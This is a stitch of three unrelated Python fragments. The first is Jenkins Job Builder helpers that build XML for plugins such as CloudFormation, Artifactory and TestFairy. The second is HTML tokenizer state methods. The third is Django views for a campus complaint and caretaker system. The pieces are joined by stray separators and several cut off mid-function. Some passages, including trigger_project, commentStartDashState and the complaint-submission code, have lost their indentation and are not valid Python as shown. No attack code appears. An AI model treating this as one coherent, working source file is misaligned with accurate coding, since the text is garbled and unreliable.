
    # Per-selector extra options.
    mapping = []
    if select == 'specific-build':
        mapping.append(('build-number', 'buildNumber', ''))
    elif select == 'last-successful':
        mapping.append(('stable', 'stable', False))
    elif select == 'upstream-build':
        mapping.append(
            ('fallback-to-last-successful', 'fallbackToLastSuccessful', False))
    elif select == 'permalink':
        mapping.append(('', 'id', permalinkdict[permalink]))
    elif select == 'build-param':
        mapping.append(('param', 'parameterName', ''))
    elif select == 'downstream-build':
        mapping.append(
            ('upstream-project-name', 'upstreamProjectName', ''))
        mapping.append(
            ('upstream-build-number', 'upstreamBuildNumber', ''))
    convert_mapping_to_xml(selector, data, mapping, fail_required=False)
def findbugs_settings(xml_parent, data):
    """Write the general FindBugs options (rank priority and the
    include/exclude file patterns) onto *xml_parent*."""
    general_options = [
        ('rank-priority', 'isRankActivated', False),
        ('include-files', 'includePattern', ''),
        ('exclude-files', 'excludePattern', ''),
    ]
    convert_mapping_to_xml(xml_parent, data, general_options,
                           fail_required=True)
def get_value_from_yaml_or_config_file(key, section, data, jjb_config):
    """Return data[key] when present, otherwise the plugin-config value
    for (*section*, *key*), defaulting to ''."""
    fallback = data.get(key, '')
    return jjb_config.get_plugin_config(section, key, fallback)
def cloudformation_region_dict():
    """Return the mapping from AWS region codes to the region identifiers
    used by the AWS CloudFormation plugin."""
    return {
        'us-east-1': 'US_East_Northern_Virginia',
        'us-west-1': 'US_WEST_Northern_California',
        'us-west-2': 'US_WEST_Oregon',
        'eu-central-1': 'EU_Frankfurt',
        'eu-west-1': 'EU_Ireland',
        'ap-southeast-1': 'Asia_Pacific_Singapore',
        'ap-southeast-2': 'Asia_Pacific_Sydney',
        'ap-northeast-1': 'Asia_Pacific_Tokyo',
        'sa-east-1': 'South_America_Sao_Paulo',
    }
def cloudformation_init(xml_parent, data, xml_tag):
    """Create the CloudFormation wrapper element named by *xml_tag* and
    return its <stacks> child, to which stack beans are appended."""
    wrapper_tag = ('com.syncapse.jenkinsci.plugins.awscloudformationwrapper.'
                   + xml_tag)
    cloudformation = XML.SubElement(xml_parent, wrapper_tag)
    return XML.SubElement(cloudformation, 'stacks')
def cloudformation_stack(xml_parent, stack, xml_tag, stacks, region_dict):
    """Append one CloudFormation stack bean to *stacks*.

    ``SimpleStackBean`` (stack deletion) only carries the prefix flag;
    other bean types carry the full creation options.

    :raises MissingAttributeError: if the stack has no (non-empty) name.
    """
    if 'name' not in stack or stack['name'] == '':
        raise MissingAttributeError('name')
    step = XML.SubElement(
        stacks, 'com.syncapse.jenkinsci.plugins.'
        'awscloudformationwrapper.' + xml_tag)
    if xml_tag == 'SimpleStackBean':
        extra_mapping = [('prefix', 'isPrefixSelected', False)]
    else:
        parameters_value = ','.join(stack.get('parameters', []))
        extra_mapping = [
            ('description', 'description', ''),
            ('', 'parameters', parameters_value),
            ('timeout', 'timeout', '0'),
            ('sleep', 'sleep', '0'),
            ('recipe', 'cloudFormationRecipe', None)]
    cloudformation_stack_mapping = [
        ('name', 'stackName', None),
        ('access-key', 'awsAccessKey', None),
        ('secret-key', 'awsSecretKey', None),
        ('region', 'awsRegion', None, region_dict)]
    # extend() replaces the old append() loop, whose loop variable also
    # shadowed the built-in ``map``.
    cloudformation_stack_mapping.extend(extra_mapping)
    convert_mapping_to_xml(step, stack,
                           cloudformation_stack_mapping, fail_required=True)
def include_exclude_patterns(xml_parent, data, yaml_prefix,
                             xml_elem_name):
    """Emit *xml_elem_name* holding comma-joined pattern lists read from
    '<yaml_prefix>-include-patterns' / '<yaml_prefix>-exclude-patterns'."""
    container = XML.SubElement(xml_parent, xml_elem_name)
    for kind in ('include', 'exclude'):
        patterns = data.get('%s-%s-patterns' % (yaml_prefix, kind), [])
        XML.SubElement(container, kind + 'Patterns').text = ','.join(patterns)
def artifactory_deployment_patterns(xml_parent, data):
    """Emit the Artifactory artifact-deployment include/exclude patterns."""
    include_exclude_patterns(xml_parent, data,
                             yaml_prefix='deployment',
                             xml_elem_name='artifactDeploymentPatterns')
def artifactory_env_vars_patterns(xml_parent, data):
    """Emit the Artifactory environment-variable include/exclude patterns."""
    include_exclude_patterns(xml_parent, data,
                             yaml_prefix='env-vars',
                             xml_elem_name='envVarsPatterns')
def artifactory_optional_props(xml_parent, data, target):
    """Write the optional Artifactory string and boolean properties.

    *target* ('wrappers' / 'publishers') selects which extra group of
    boolean flags is emitted on top of the common ones.
    """
    optional_str_props = [
        ('scopes', 'scopes'),
        ('violationRecipients', 'violation-recipients'),
        ('blackDuckAppName', 'black-duck-app-name'),
        ('blackDuckAppVersion', 'black-duck-app-version'),
        ('blackDuckReportRecipients', 'black-duck-report-recipients'),
        ('blackDuckScopes', 'black-duck-scopes')
    ]
    for xml_prop, yaml_prop in optional_str_props:
        XML.SubElement(xml_parent, xml_prop).text = data.get(yaml_prop, '')

    # (yaml property name, xml property name, default value)
    common_bool_props = [
        ('deploy-artifacts', 'deployArtifacts', True),
        ('discard-old-builds', 'discardOldBuilds', False),
        ('discard-build-artifacts', 'discardBuildArtifacts', False),
        ('publish-build-info', 'deployBuildInfo', False),
        ('env-vars-include', 'includeEnvVars', False),
        ('run-checks', 'runChecks', False),
        ('include-publish-artifacts', 'includePublishArtifacts', False),
        ('license-auto-discovery', 'licenseAutoDiscovery', True),
        ('enable-issue-tracker-integration', 'enableIssueTrackerIntegration',
         False),
        ('aggregate-build-issues', 'aggregateBuildIssues', False),
        ('black-duck-run-checks', 'blackDuckRunChecks', False),
        ('black-duck-include-published-artifacts',
         'blackDuckIncludePublishedArtifacts', False),
        ('auto-create-missing-component-requests',
         'autoCreateMissingComponentRequests', True),
        ('auto-discard-stale-component-requests',
         'autoDiscardStaleComponentRequests', True),
        ('filter-excluded-artifacts-from-build',
         'filterExcludedArtifactsFromBuild', False)
    ]
    convert_mapping_to_xml(
        xml_parent, data, common_bool_props, fail_required=True)

    if 'wrappers' in target:
        wrapper_bool_props = [
            ('enable-resolve-artifacts', 'enableResolveArtifacts', False),
            ('disable-license-auto-discovery',
             'disableLicenseAutoDiscovery', False),
            ('record-all-dependencies',
             'recordAllDependencies', False)
        ]
        convert_mapping_to_xml(
            xml_parent, data, wrapper_bool_props, fail_required=True)

    if 'publishers' in target:
        publisher_bool_props = [
            ('even-if-unstable', 'evenIfUnstable', False),
            ('pass-identified-downstream', 'passIdentifiedDownstream', False),
            ('allow-promotion-of-non-staged-builds',
             'allowPromotionOfNonStagedBuilds', False)
        ]
        convert_mapping_to_xml(
            xml_parent, data, publisher_bool_props, fail_required=True)
def artifactory_common_details(details, data):
    """Write the Artifactory server name/url pair under *details*."""
    name_url_mapping = [
        ('name', 'artifactoryName', ''),
        ('url', 'artifactoryUrl', ''),
    ]
    convert_mapping_to_xml(details, data, name_url_mapping,
                           fail_required=True)
def artifactory_repository(xml_parent, data, target):
    """Write the release and/or snapshot repository settings, chosen by
    whether *target* mentions 'release' and/or 'snapshot'."""
    for marker, repo_key in (('release', 'deploy-release-repo-key'),
                             ('snapshot', 'deploy-snapshot-repo-key')):
        if marker in target:
            repo_mapping = [
                (repo_key, 'keyFromText', ''),
                (repo_key, 'keyFromSelect', ''),
                ('deploy-dynamic-mode', 'dynamicMode', False),
            ]
            convert_mapping_to_xml(
                xml_parent, data, repo_mapping, fail_required=True)
def append_git_revision_config(parent, config_def):
    """Append a GitRevisionBuildParameters element.

    *config_def* is either an options dict or a bare boolean (the
    'git-revision: true' YAML shorthand); combine-queued-commits defaults
    to false in both cases.
    """
    params = XML.SubElement(
        parent, 'hudson.plugins.git.GitRevisionBuildParameters')
    try:
        combine = str(
            config_def.get('combine-queued-commits', False)).lower()
    except AttributeError:
        # config_def was a plain boolean, not a dict: no sub-options.
        combine = 'false'
    XML.SubElement(params, 'combineQueuedCommits').text = combine
def test_fairy_common(xml_element, data):
    """Write the TestFairy options shared by its publisher variants."""
    xml_element.set('plugin', 'TestFairy')
    valid_max_duration = ['10m', '60m', '300m', '1440m']
    valid_interval = [1, 2, 5]
    valid_video_quality = ['high', 'medium', 'low']

    general = [
        ('apikey', 'apiKey', None),
        ('appfile', 'appFile', None),
        ('tester-groups', 'testersGroups', ''),
        ('notify-testers', 'notifyTesters', True),
        ('autoupdate', 'autoUpdate', True),
    ]
    session = [
        ('max-duration', 'maxDuration', '10m', valid_max_duration),
        ('record-on-background', 'recordOnBackground', False),
        ('data-only-wifi', 'dataOnlyWifi', False),
    ]
    video = [
        ('video-enabled', 'isVideoEnabled', True),
        ('screenshot-interval', 'screenshotInterval', 1, valid_interval),
        ('video-quality', 'videoQuality', 'high', valid_video_quality),
    ]
    metrics = [
        ('cpu', 'cpu', True),
        ('memory', 'memory', True),
        ('logs', 'logs', True),
        ('network', 'network', False),
        ('phone-signal', 'phoneSignal', False),
        ('wifi', 'wifi', False),
        ('gps', 'gps', False),
        ('battery', 'battery', False),
        ('opengl', 'openGl', False),
    ]
    advanced = [
        ('advanced-options', 'advancedOptions', ''),
    ]
    mappings = general + session + video + metrics + advanced
    convert_mapping_to_xml(xml_element, data, mappings, fail_required=True)
def trigger_get_parameter_order(registry, plugin):
    """Return the deprecated hardcoded parameter-set order for *plugin*,
    or None when the (default) YAML-declared order should be used."""
    logger = logging.getLogger("%s:trigger_get_parameter_order" % __name__)

    use_yaml_order = registry.jjb_config.get_plugin_config(
        plugin, 'param_order_from_yaml', True)
    if str(use_yaml_order).lower() != 'false':
        return None

    logger.warning(
        "Using deprecated order for parameter sets in %s. It is "
        "recommended that you update your job definition instead of "
        "enabling use of the old hardcoded order", plugin)

    # deprecated order
    return [
        'predefined-parameters',
        'git-revision',
        'property-file',
        'current-parameters',
        'node-parameters',
        'svn-revision',
        'restrict-matrix-project',
        'node-label-name',
        'node-label',
        'boolean-parameters',
    ]
def trigger_project(tconfigs, project_def, param_order=None):
logger = logging.getLogger("%s:trigger_project" % __name__)
pt_prefix = 'hudson.plugins.parameterizedtrigger.'
if param_order:
parameters = param_order
else:
parameters = project_def.keys()
for param_type in parameters:
param_value = project_def.get(param_type)
if param_value is None:
continue
if param_type == 'predefined-parameters':
params = XML.SubElement(tconfigs, pt_prefix +
'PredefinedBuildParameters')
| |
= self.lastFourChars[-4:]
return True
def entityDataState(self):
    """Handle "&" seen in the data state: emit the decoded entity if one
    can be consumed, otherwise a literal "&" character token."""
    entity = self.consumeEntity()
    if entity:
        self.tokenQueue.append({"type": "Characters", "data": entity})
    else:
        self.tokenQueue.append({"type": "Characters", "data": u"&"})
    self.state = self.states["data"]
    return True
def tagOpenState(self):
    """After "<": dispatch to markup declaration, close tag, or start tag,
    or fall back to emitting literal text, depending on the content model."""
    data = self.stream.char()
    if self.contentModelFlag == contentModelFlags["PCDATA"]:
        if data == u"!":
            self.state = self.states["markupDeclarationOpen"]
        elif data == u"/":
            self.state = self.states["closeTagOpen"]
        elif data in asciiLetters:
            self.currentToken =\
                {"type": "StartTag", "name": data, "data": []}
            self.state = self.states["tagName"]
        elif data == u">":
            # XXX In theory it could be something besides a tag name. But
            # do we really care?
            self.tokenQueue.append({"type": "ParseError", "data":
                "expected-tag-name-but-got-right-bracket"})
            self.tokenQueue.append({"type": "Characters", "data": u"<>"})
            self.state = self.states["data"]
        elif data == u"?":
            # XXX In theory it could be something besides a tag name. But
            # do we really care?
            self.tokenQueue.append({"type": "ParseError", "data":
                "expected-tag-name-but-got-question-mark"})
            self.stream.unget(data)
            self.state = self.states["bogusComment"]
        else:
            # XXX
            self.tokenQueue.append({"type": "ParseError", "data":
                "expected-tag-name"})
            self.tokenQueue.append({"type": "Characters", "data": u"<"})
            self.stream.unget(data)
            self.state = self.states["data"]
    else:
        # We know the content model flag is set to either RCDATA or CDATA
        # now because this state can never be entered with the PLAINTEXT
        # flag.
        if data == u"/":
            self.state = self.states["closeTagOpen"]
        else:
            self.tokenQueue.append({"type": "Characters", "data": u"<"})
            self.stream.unget(data)
            self.state = self.states["data"]
    return True
def closeTagOpenState(self):
    """After "</": in RCDATA/CDATA, only treat this as a real end tag when
    the upcoming name matches the last emitted start tag; otherwise emit
    "</" as text. Then (or in PCDATA) read the end tag name or recover."""
    if (self.contentModelFlag in (contentModelFlags["RCDATA"],
                                  contentModelFlags["CDATA"])):
        if self.currentToken:
            charStack = []

            # So far we know that "</" has been consumed. We now need to know
            # whether the next few characters match the name of last emitted
            # start tag which also happens to be the currentToken. We also need
            # to have the character directly after the characters that could
            # match the start tag name.
            for x in xrange(len(self.currentToken["name"]) + 1):
                charStack.append(self.stream.char())
                # Make sure we don't get hit by EOF
                if charStack[-1] == EOF:
                    break

            # Since this is just for checking. We put the characters back on
            # the stack.
            self.stream.unget(charStack)

        if self.currentToken \
            and self.currentToken["name"].lower() == "".join(charStack[:-1]).lower() \
            and charStack[-1] in (spaceCharacters |
                                  frozenset((u">", u"/", u"<", EOF))):
            # Because the characters are correct we can safely switch to
            # PCDATA mode now. This also means we don't have to do it when
            # emitting the end tag token.
            self.contentModelFlag = contentModelFlags["PCDATA"]
        else:
            self.tokenQueue.append({"type": "Characters", "data": u"</"})
            self.state = self.states["data"]

            # Need to return here since we don't want the rest of the
            # method to be walked through.
            return True

    data = self.stream.char()
    if data in asciiLetters:
        self.currentToken = {"type":"EndTag", "name":data, "data":[]}
        self.state = self.states["tagName"]
    elif data == u">":
        self.tokenQueue.append({"type": "ParseError", "data":
            "expected-closing-tag-but-got-right-bracket"})
        self.state = self.states["data"]
    elif data == EOF:
        self.tokenQueue.append({"type": "ParseError", "data":
            "expected-closing-tag-but-got-eof"})
        self.tokenQueue.append({"type": "Characters", "data": u"</"})
        self.state = self.states["data"]
    else:
        # XXX data can be _'_...
        self.tokenQueue.append({"type": "ParseError", "data":
            "expected-closing-tag-but-got-char",
            "datavars": {"data": data}})
        self.stream.unget(data)
        self.state = self.states["bogusComment"]
    return True
def tagNameState(self):
    """Accumulate the name of the current start/end tag token."""
    data = self.stream.char()
    if data in spaceCharacters:
        self.state = self.states["beforeAttributeName"]
    elif data in asciiLetters:
        # Greedily consume the following run of letters in one call.
        self.currentToken["name"] += data +\
            self.stream.charsUntil(asciiLetters, True)
    elif data == u">":
        self.emitCurrentToken()
    elif data == EOF:
        self.tokenQueue.append({"type": "ParseError", "data":
            "eof-in-tag-name"})
        self.emitCurrentToken()
    elif data == u"/":
        self.processSolidusInTag()
        self.state = self.states["beforeAttributeName"]
    else:
        self.currentToken["name"] += data
    return True
def beforeAttributeNameState(self):
    """Skip whitespace, then either start a new attribute (appending a
    fresh [name, value] pair to the token) or end the tag."""
    data = self.stream.char()
    if data in spaceCharacters:
        self.stream.charsUntil(spaceCharacters, True)
    elif data in asciiLetters:
        self.currentToken["data"].append([data, ""])
        self.state = self.states["attributeName"]
    elif data == u">":
        self.emitCurrentToken()
    elif data == u"/":
        self.processSolidusInTag()
    elif data == u"'" or data == u'"' or data == u"=":
        # Quote/equals characters here are a parse error but still begin
        # an attribute name.
        self.tokenQueue.append({"type": "ParseError", "data":
            "invalid-character-in-attribute-name"})
        self.currentToken["data"].append([data, ""])
        self.state = self.states["attributeName"]
    elif data == EOF:
        self.tokenQueue.append({"type": "ParseError", "data":
            "expected-attribute-name-but-got-eof"})
        self.emitCurrentToken()
    else:
        self.currentToken["data"].append([data, ""])
        self.state = self.states["attributeName"]
    return True
def attributeNameState(self):
    """Accumulate the current attribute's name; when leaving the state,
    optionally lowercase it and report duplicate attribute names."""
    data = self.stream.char()
    leavingThisState = True
    emitToken = False
    if data == u"=":
        self.state = self.states["beforeAttributeValue"]
    elif data in asciiLetters:
        self.currentToken["data"][-1][0] += data +\
            self.stream.charsUntil(asciiLetters, True)
        leavingThisState = False
    elif data == u">":
        # XXX If we emit here the attributes are converted to a dict
        # without being checked and when the code below runs we error
        # because data is a dict not a list
        emitToken = True
    elif data in spaceCharacters:
        self.state = self.states["afterAttributeName"]
    elif data == u"/":
        if not self.processSolidusInTag():
            self.state = self.states["beforeAttributeName"]
    elif data == u"'" or data == u'"':
        self.tokenQueue.append({"type": "ParseError", "data":
            "invalid-character-in-attribute-name"})
        self.currentToken["data"][-1][0] += data
        leavingThisState = False
    elif data == EOF:
        self.tokenQueue.append({"type": "ParseError", "data":
            "eof-in-attribute-name"})
        self.state = self.states["data"]
        emitToken = True
    else:
        self.currentToken["data"][-1][0] += data
        leavingThisState = False

    if leavingThisState:
        # Attributes are not dropped at this stage. That happens when the
        # start tag token is emitted so values can still be safely appended
        # to attributes, but we do want to report the parse error in time.
        if self.lowercaseAttrName:
            self.currentToken["data"][-1][0] = (
                self.currentToken["data"][-1][0].translate(asciiUpper2Lower))
        for name, value in self.currentToken["data"][:-1]:
            if self.currentToken["data"][-1][0] == name:
                self.tokenQueue.append({"type": "ParseError", "data":
                    "duplicate-attribute"})
                break
        # XXX Fix for above XXX
        if emitToken:
            self.emitCurrentToken()
    return True
def afterAttributeNameState(self):
    """After an attribute name plus whitespace: expect '=', the start of
    another attribute, or the end of the tag."""
    data = self.stream.char()
    if data in spaceCharacters:
        self.stream.charsUntil(spaceCharacters, True)
    elif data == u"=":
        self.state = self.states["beforeAttributeValue"]
    elif data == u">":
        self.emitCurrentToken()
    elif data in asciiLetters:
        self.currentToken["data"].append([data, ""])
        self.state = self.states["attributeName"]
    elif data == u"/":
        if not self.processSolidusInTag():
            self.state = self.states["beforeAttributeName"]
    elif data == EOF:
        self.tokenQueue.append({"type": "ParseError", "data":
            "expected-end-of-tag-but-got-eof"})
        self.emitCurrentToken()
    else:
        self.currentToken["data"].append([data, ""])
        self.state = self.states["attributeName"]
    return True
def beforeAttributeValueState(self):
    """Dispatch on the quoting style of the upcoming attribute value."""
    data = self.stream.char()
    if data in spaceCharacters:
        self.stream.charsUntil(spaceCharacters, True)
    elif data == u"\"":
        self.state = self.states["attributeValueDoubleQuoted"]
    elif data == u"&":
        # '&' may begin an entity: reprocess it in the unquoted-value state.
        self.state = self.states["attributeValueUnQuoted"]
        self.stream.unget(data);
    elif data == u"'":
        self.state = self.states["attributeValueSingleQuoted"]
    elif data == u">":
        self.emitCurrentToken()
    elif data == u"=":
        self.tokenQueue.append({"type": "ParseError", "data":
            "equals-in-unquoted-attribute-value"})
        self.currentToken["data"][-1][1] += data
        self.state = self.states["attributeValueUnQuoted"]
    elif data == EOF:
        self.tokenQueue.append({"type": "ParseError", "data":
            "expected-attribute-value-but-got-eof"})
        self.emitCurrentToken()
    else:
        self.currentToken["data"][-1][1] += data
        self.state = self.states["attributeValueUnQuoted"]
    return True
def attributeValueDoubleQuotedState(self):
    """Accumulate a double-quoted attribute value until the closing quote."""
    data = self.stream.char()
    if data == "\"":
        self.state = self.states["afterAttributeValue"]
    elif data == u"&":
        self.processEntityInAttribute(u'"')
    elif data == EOF:
        self.tokenQueue.append({"type": "ParseError", "data":
            "eof-in-attribute-value-double-quote"})
        self.emitCurrentToken()
    else:
        # Bulk-consume everything up to the next quote or entity start.
        self.currentToken["data"][-1][1] += data +\
            self.stream.charsUntil(("\"", u"&"))
    return True
def attributeValueSingleQuotedState(self):
    """Accumulate a single-quoted attribute value until the closing quote."""
    data = self.stream.char()
    if data == "'":
        self.state = self.states["afterAttributeValue"]
    elif data == u"&":
        self.processEntityInAttribute(u"'")
    elif data == EOF:
        self.tokenQueue.append({"type": "ParseError", "data":
            "eof-in-attribute-value-single-quote"})
        self.emitCurrentToken()
    else:
        # Bulk-consume everything up to the next quote or entity start.
        self.currentToken["data"][-1][1] += data +\
            self.stream.charsUntil(("'", u"&"))
    return True
def attributeValueUnQuotedState(self):
    """Accumulate an unquoted attribute value until whitespace or '>'."""
    data = self.stream.char()
    if data in spaceCharacters:
        self.state = self.states["beforeAttributeName"]
    elif data == u"&":
        self.processEntityInAttribute(None)
    elif data == u">":
        self.emitCurrentToken()
    elif data == u'"' or data == u"'" or data == u"=":
        # Quotes/equals inside an unquoted value are a parse error but are
        # still taken as part of the value.
        self.tokenQueue.append({"type": "ParseError", "data":
            "unexpected-character-in-unquoted-attribute-value"})
        self.currentToken["data"][-1][1] += data
    elif data == EOF:
        self.tokenQueue.append({"type": "ParseError", "data":
            "eof-in-attribute-value-no-quotes"})
        self.emitCurrentToken()
    else:
        self.currentToken["data"][-1][1] += data + self.stream.charsUntil( \
            frozenset(("&", ">", "<", "=", "'", '"')) | spaceCharacters)
    return True
def afterAttributeValueState(self):
    """After a quoted attribute value: expect whitespace, '/', or '>';
    anything else is reprocessed as the start of a new attribute."""
    data = self.stream.char()
    if data in spaceCharacters:
        self.state = self.states["beforeAttributeName"]
    elif data == u">":
        self.emitCurrentToken()
        self.state = self.states["data"]
    elif data == u"/":
        if not self.processSolidusInTag():
            self.state = self.states["beforeAttributeName"]
    elif data == EOF:
        self.tokenQueue.append({"type": "ParseError", "data":
            "unexpected-EOF-after-attribute-value"})
        self.emitCurrentToken()
        self.stream.unget(data)
        self.state = self.states["data"]
    else:
        self.tokenQueue.append({"type": "ParseError", "data":
            "unexpected-character-after-attribute-value"})
        self.stream.unget(data)
        self.state = self.states["beforeAttributeName"]
    return True
def bogusCommentState(self):
    """Error recovery: swallow malformed markup as a comment token."""
    # Make a new comment token and give it as value all the characters
    # until the first > or EOF (charsUntil checks for EOF automatically)
    # and emit it.
    self.tokenQueue.append(
        {"type": "Comment", "data": self.stream.charsUntil((u">"))})

    # Eat the character directly after the bogus comment which is either a
    # ">" or an EOF.
    self.stream.char()
    self.state = self.states["data"]
    return True
def markupDeclarationOpenState(self):
    """After "<!": recognise "--" (comment) or "DOCTYPE" (case-insensitive),
    otherwise recover via the bogus-comment state."""
    charStack = [self.stream.char(), self.stream.char()]
    if charStack == [u"-", u"-"]:
        self.currentToken = {"type": "Comment", "data": u""}
        self.state = self.states["commentStart"]
    else:
        # Peek five more characters to test for "DOCTYPE".
        for x in xrange(5):
            charStack.append(self.stream.char())
        # Put in explicit EOF check
        if (not EOF in charStack and
            "".join(charStack).upper() == u"DOCTYPE"):
            self.currentToken = {"type":"Doctype", "name":u"",
                "publicId":None, "systemId":None, "correct":True}
            self.state = self.states["doctype"]
        else:
            self.tokenQueue.append({"type": "ParseError", "data":
                "expected-dashes-or-doctype"})
            self.stream.unget(charStack)
            self.state = self.states["bogusComment"]
    return True
def commentStartState(self):
    """Just inside "<!--": handle '-', a premature '>' or EOF, or begin
    accumulating comment text."""
    data = self.stream.char()
    if data == "-":
        self.state = self.states["commentStartDash"]
    elif data == ">":
        self.tokenQueue.append({"type": "ParseError", "data":
            "incorrect-comment"})
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    elif data == EOF:
        self.tokenQueue.append({"type": "ParseError", "data":
            "eof-in-comment"})
        self.tokenQueue.append(self.currentToken)
        self.state = self.states["data"]
    else:
        # Bulk-consume comment text up to the next '-'.
        self.currentToken["data"] += data + self.stream.charsUntil(u"-")
        self.state = self.states["comment"]
    return True
def commentStartDashState(self):
data = self.stream.char()
if data == "-":
self.state = self.states["commentEnd"]
elif data == ">":
self.tokenQueue.append({"type": "ParseError", "data":
"incorrect-comment"})
self.tokenQueue.append(self.currentToken)
self.state = self.states["data"]
elif data == EOF:
self.tokenQueue.append({"type": "ParseError", "data":
"eof-in-comment"})
self.tokenQueue.append(self.currentToken)
self.state | |
comp_id = request.POST.get('comp_id', '')
comp_type = request.POST.get('complaint_type', '')
location = request.POST.get('Location', '')
specific_location = request.POST.get('specific_location', '')
comp_file = request.FILES.get('myfile')
print("Attachment : ",comp_file)
details = request.POST.get('details', '')
complaint_finish = datetime.now() + timedelta(days=2)
if comp_type == 'Electricity':
complaint_finish = datetime.now() + timedelta(days=2)
elif comp_type == 'carpenter':
complaint_finish = datetime.now() + timedelta(days=2)
elif comp_type == 'plumber':
complaint_finish = datetime.now() + timedelta(days=2)
elif comp_type == 'garbage':
complaint_finish = datetime.now() + timedelta(days=1)
elif comp_type == 'dustbin':
complaint_finish = datetime.now() + timedelta(days=1)
elif comp_type == 'internet':
complaint_finish = datetime.now() + timedelta(days=4)
elif comp_type == 'other':
complaint_finish = datetime.now() + timedelta(days=3)
y = ExtraInfo.objects.get(id=comp_id)
x = StudentComplain(complainer=y,
complaint_type=comp_type,
location=location,
specific_location=specific_location,
details=details,
complaint_finish=complaint_finish,
upload_complaint =comp_file)
print('lets check')
x.save()
# messages.info(request,'Complaint successfully launched.')
# return HttpResponseRedirect('/complaint/user/')
return HttpResponseRedirect('/complaint/user/')
@login_required
def caretaker(request):
    """
    Render the caretaker dashboard and optionally register a new worker.

    POST: reads a worker registration form (type/name/phone/age), validates
    the phone number and age range, and saves a new Workers row if an
    identical one does not already exist; then renders the dashboard.
    GET: renders the dashboard with complaint history, the worker list,
    per-worker assigned-complaint counts and overdue complaints.

    NOTE(review): several loops below keep only every other row of a
    queryset (the ``j % 2`` pattern) — this appears to compensate for rows
    being stored twice upstream; confirm against the data model.
    """
    current_user = get_object_or_404(User, username=request.user.username)
    y = ExtraInfo.objects.all().filter(user=current_user).first()
    if request.method == 'POST':
        # NOTE(review): ``type`` shadows the builtin and is never used.
        type = request.POST.get('submit', '')
        worker_type = request.POST.get('complaint_type', '')
        name = request.POST.get('name', '')
        phone = request.POST.get('phone_no', '')
        age = request.POST.get('age', '')
        try:
            y = ExtraInfo.objects.get(id=y.id)
            a = Caretaker.objects.get(staff_id=y)
        except Exception as e:
            print(e)
            # If the lookup fails both become None; the code below would then
            # raise AttributeError at ``a.area`` — pre-existing behavior.
            a = None
            y = None
        # May raise ValueError on non-numeric form input (pre-existing).
        intage = int(age)
        intphone = int(phone)
        # Accept only 10-digit phone numbers and ages strictly between 21-49.
        if len(phone) == 10 and intage > 20 and intage < 50 and intphone > 1999999999:
            x = Workers(caretaker_id=a,
                        name=name,
                        age=age,
                        phone=phone,
                        worker_type=worker_type)
            # Avoid inserting an exact duplicate worker row.
            if not Workers.objects.filter(caretaker_id=a,name=name, age=age,phone=phone,worker_type=worker_type).exists():
                x.save()
        b = a.area
        historytemp = StudentComplain.objects.filter(location=b).order_by('-id')
        history = []
        j = 1
        k = 1
        # Keep every other complaint row (see NOTE in the docstring).
        for i in historytemp:
            if j%2 == 1:
                history.append(i)
            j = j+1
        # Attach 1-based display numbers for the template.
        for h in history:
            h.serial_no = k
            k=k+1
        total_worker = []
        total_workertemp = Workers.objects.filter(caretaker_id=a)
        j = 1
        for i in total_workertemp:
            if j%2 != 0:
                total_worker.append(i)
            j = j + 1
        complaint_assign_no = []
        # Annotate each worker with how many complaints are assigned to them.
        for x in total_worker:
            worker = Workers.objects.get(id=x.id)
            temp = StudentComplain.objects.filter(worker_id=worker).count()
            worker.total_complaint = temp
            complaint_assign_no.append(worker)
        return render(request, "complaintModule/complaint_caretaker.html",
                      {'history': history, 'comp_id': y.id, 'total_worker':
                       total_worker, 'complaint_assign_no': complaint_assign_no})
    else:
        y = ExtraInfo.objects.get(id=y.id)
        a = Caretaker.objects.get(staff_id=y)
        b = a.area
        history = []
        historytemp = StudentComplain.objects.filter(location=b).order_by('-id')
        total_worker = []
        total_workertemp = Workers.objects.filter(caretaker_id=a)
        j = 1
        for i in total_workertemp:
            if j%2 != 0:
                total_worker.append(i)
            j = j + 1
        # NOTE(review): duplicated initialization, second line is redundant.
        complaint_assign_no = []
        complaint_assign_no = []
        for x in total_worker:
            worker = Workers.objects.get(id=x.id)
            temp = StudentComplain.objects.filter(worker_id=worker).count()
            worker.total_complaint = temp
            complaint_assign_no.append(worker)
        overduecomplaint = []
        j = 1
        k = 1
        for i in historytemp:
            if j%2 != 0:
                history.append(i)
            j=j+1
        # Number the rows and collect unresolved complaints past their
        # scheduled finish date (status 2/3 mean resolved/declined here —
        # presumably; confirm against the model's status choices).
        for i in history:
            i.serial_no = k
            k = k + 1
            if i.status != 2 and i.status !=3:
                if i.complaint_finish < date.today():
                    i.delay = date.today() - i.complaint_finish
                    overduecomplaint.append(i)
        return render(request, "complaintModule/complaint_caretaker.html",
                      { 'history': history, 'comp_id': y.id, 'total_worker': total_worker,
                        'complaint_assign_no': complaint_assign_no,
                        'overduecomplaint': overduecomplaint, 'care_id': a})
@login_required
def changestatus(request, complaint_id, status):
    """
    Let a caretaker change the status of a complaint.

    Parameters:
        request - trivial.
        complaint_id - primary key of the complaint to update.
        status - the new status as a string ('2' and '3' also clear the
            assigned worker; any other value only updates the status).

    Always redirects back to the caretaker dashboard.

    Fix: statuses '2' and '3' previously ran two byte-identical branches;
    they are consolidated into one.
    """
    if status in ('2', '3'):
        # Resolved ('2') or declined ('3'): detach the assigned worker too.
        StudentComplain.objects.filter(id=complaint_id).\
                        update(status=status, worker_id='')
    else:
        StudentComplain.objects.filter(id=complaint_id).\
                        update(status=status)
    return HttpResponseRedirect('/complaint/caretaker/')
@login_required
def removew(request, work_id):
    """
    Let a caretaker delete a worker, but only when no complaint is
    currently assigned to that worker.

    Parameters:
        request - trivial.
        work_id - primary key of the worker to remove.
    """
    worker = Workers.objects.get(id=work_id)
    assigned = StudentComplain.objects.filter(worker_id=worker).count()
    if assigned:
        # At least one complaint still references this worker; refuse.
        return HttpResponse('<H1> Worker is assign some complaint</h1>')
    worker.delete()
    return HttpResponseRedirect('/complaint/caretaker/')
@login_required
def submitfeedback(request, complaint_id):
    """
    Record the complainant's feedback and rating for a resolved complaint
    and fold the rating into the area caretaker's running rating.

    POST: stores feedback/rating on the complaint, updates the caretaker's
    rating (first rating is taken verbatim, later ones are averaged with
    the current value) and redirects to the user page.
    GET: renders the feedback form for the complaint.

    Fix: removed an unreachable ``return render(...)`` that followed the
    redirect in the POST branch.
    """
    if request.method == 'POST':
        feedback = request.POST.get('feedback', '')
        rating = request.POST.get('rating', '')
        StudentComplain.objects.filter(id=complaint_id).\
            update(feedback=feedback, flag=rating)
        a = StudentComplain.objects.filter(id=complaint_id).first()
        care = Caretaker.objects.filter(area=a.location).first()
        rate = care.rating
